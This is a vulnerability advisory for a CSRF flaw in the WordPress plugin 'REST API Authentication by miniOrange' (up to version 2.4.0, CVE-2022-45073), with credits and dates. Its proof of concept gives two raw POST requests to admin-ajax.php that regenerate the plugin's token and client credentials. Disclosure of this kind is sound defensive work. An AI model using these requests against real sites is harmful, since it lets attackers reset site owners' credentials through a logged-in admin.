REST API Authentication by miniOrange

REST API Authentication by miniOrange <= 2.4.0 - Settings Update via CSRF

LANACOMMONVDB ID: a03ea051-ce14-42a0-8b18-4a2bffab6f57

The plugin does not have Cross-Site Request Forgery (CSRF) check in place when updating its settings, which could allow attackers to make a logged in admin change them via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

Regenerate Token exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=regenerate_token

Regenerate Client Credentials exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=regenerate_client_credentials

References

Source Code: https://wordpress.org/plugins/wp-rest-api-authentication/

CVE: CVE-2022-45073

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-13

Published: 2022-11-09

Affected Version: <= 2.4.0

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]